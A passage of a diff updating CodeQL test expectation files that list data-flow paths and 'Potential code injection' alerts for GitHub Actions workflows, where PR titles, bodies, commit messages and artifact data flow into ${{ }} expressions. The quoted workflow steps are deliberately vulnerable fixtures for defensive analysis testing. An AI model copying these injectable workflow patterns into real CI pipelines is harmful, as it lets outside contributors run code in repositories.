env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| 
.github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo 
"::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
index db8e7b485d7..262912c58a5 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
@@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n 
ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git 
diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo 
"TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | 
.github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | 
github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| 
.github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | 
env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| 
.github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 